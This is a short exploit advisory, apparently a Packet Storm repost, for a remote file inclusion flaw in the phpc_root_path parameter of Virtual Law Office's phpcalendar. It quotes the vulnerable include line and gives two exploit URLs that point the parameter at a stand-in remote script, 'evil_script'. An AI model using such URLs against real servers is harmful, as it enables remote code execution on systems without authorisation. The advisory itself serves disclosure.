Virtual Law Office suffers from a remote file inclusion vulnerability in phpc_root_path.
8ac3373bf1a38ff13ba1946d290788110bb5c7d9182e5275be35eb9838eb1b69 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Virtual Law Office (phpc_root_path) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Author: xoron
Tum islam aleminin Ramazan Bayrami Mubarek oLsun..!
Ne mutlu türküm diyene
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CODE:
include($phpc_root_path . ’config.php’);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.hedef.com/[script_path]/phpcalendar/includes/calendar.php?phpc_root_path=http://evil_script?
http://www.hedef.com/[script_path]/phpcalendar/includes/setup.php?phpc_root_path=http://evil_script?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, k1k4t, x_w0x, DJR, mdx, ERNE:)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
script down: http://www.gocc.gov/groups/MA_ITD/stateprojects/files/VLO/vlo.zip
orj adv: http://www.milw0rm.com/exploits/2608
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed